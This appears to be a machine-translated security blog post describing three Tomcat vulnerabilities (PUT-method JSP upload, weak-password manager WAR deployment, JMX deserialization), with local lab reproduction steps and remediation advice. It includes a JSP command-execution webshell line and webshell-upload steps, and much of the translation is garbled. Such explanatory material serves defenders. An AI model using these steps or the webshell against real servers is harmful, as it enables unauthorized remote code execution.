web123456

Tomcat background password blasting script (python + dictionary)_Web middleware vulnerabilities of Tomcat chapter

1

Tomcatsynopsis

Tomcat server is a free open source Web application server , belongs to the lightweight application server , in the small and medium-sized systems and concurrent access to the user is not a lot of occasions are commonly used , is the first choice for the development and debugging of JSP programs .

For a beginner, think of it this way, when configuring a machine on aApache server, which can be used to respond to requests for access to HTML (an application under the Standard Generalized Markup Language) pages. Tomcat is actually an extension of the Apache server, but at runtime it runs independently, so when running tomcat, it actually runs as a separate process from Apache.

2

Remote Code Execution

Vulnerability Profile and Causes

Tomcat, running on a Windows host with the HTTP PUT request method enabled, can upload a JSP file containing arbitrary code to the server via a constructed attack request, resulting in arbitrary code execution.

Affected Versions: Apache Tomcat 7.0.0 - 7.0.81

lit. loophole is reproduced

Configuration vulnerability, enable put method to upload files

The /conf/ file in the tomcat folder inserts the

<init-param>

<param-name>readonly</param-name>

<param-value>false</param-value>

</init-param>

Restart the tomcat service

Visit 127.0.0.1: 8080, burp grab, send to Repeater, change the request method to PUT, create one, and escape the space character with %20. The content is:

<%().exec(request.getParameter("cmd"));%>

Returns 201, indicating successful creation

Accessing 127.0.0.1: 8080/?cmd=calc

pop-up calculator

Vulnerability remediation

1) Detect whether the current version is in the affected range and disable the PUT method.

2) Update and upgrade to the latest version.

3

Backend weak password war package deployment

Vulnerability Profile and Causes

Tomcat supports deploying war files in the background, and you can deploy the webshell directly to the web directory.

If a weak password exists on the backend administration page, the password can be obtained by blasting.

lit. loophole is reproduced

The configuration in conf in the Tomcat installation directory is as follows

Visit the back office and log in

Upload a war package with a jsp backdoor inside

Successfully uploaded and parsed, open the

executable system command

File management is also available, so you can view, delete, and upload files at will!

Vulnerability remediation

1) Run the Tomcat application with low privileges on the system. Create a dedicated Tomcat service user that can only have a minimal set of privileges (e.g. no remote logins).

2) Increase for local and certificate-based authentication, deploy account locking mechanism (for centralized authentication, directory services should also be configured accordingly). In CATALINA_HOME/conf/file set the locking mechanism and timeout limits.

3) As well as setting least privilege access restrictions for manager-gui/manager-status/manager-script and other directory pages.

4) Backend management avoids weak passwords.

4

deserialization vulnerability

Vulnerability Profile and Causes

This vulnerability is similar to the previousOracleThe published mxRemoteLifecycleListener deserialization vulnerability (CVE-2016-3427) is related to the use of JmxRemoteLifecycleListener's listening functionality. The remote code execution was caused by the use of the JmxRemoteLifecycleListener listener functionality, and Tomcat failed to fix the update in time after the official fix was released by Oracle.

The root cause of this vulnerability is Tomcat's use of the JmxRemoteLifecycleListener method when configuring JMX for monitoring.

The vulnerability affects the version:

ApacheTomcat 9.0.0.M1 through 9.0.0.M11.

ApacheTomcat 8.5.0 to 8.5.6

ApacheTomcat 8.0.0.RC1 to 8.0.38

ApacheTomcat 7.0.0 to 7.0.72.

ApacheTomcat 6.0.0 to 6.0.47

lit. loophole is reproduced

Utilization conditions: external need to open the JmxRemoteLifecycleListener listening to ports 10001 and 10002 to achieve remote code execution.

Configure the port on which the JmxRemoteLifecycleListener feature is enabled to listen in line 30 of conf/:

Once you have configured the jmx port, download it from the extras/ directory of your tomcat version.catalina-and download groovy-2.3.two jar packages. Download them and put them in the lib directory.

Then go to the bin directory and change catalina.bat script. Add this line in front of the ExecuteThe Requested Command comment.

Restart tomcat and listen to the local RMI service ports 10001 and 10002 to see if they are running successfully.

Constructing a payload to pop up the calculator

Successfully pops up the calculator.

Vulnerability remediation

1. Turn off the JmxRemoteLifecycleListener function, or network access control on the jmx JmxRemoteLifecycleListener remote port. At the same time, add strict authentication methods.

2、According to the official go to upgrade and update the corresponding version.

No. 59 The public account is dedicated to providing data security services to all those who are concerned about data security, both inside and outside the industry.

Enterprise colleagues to build a only share professional information, hot dissections,

An information-sharing platform for congresses within the industry.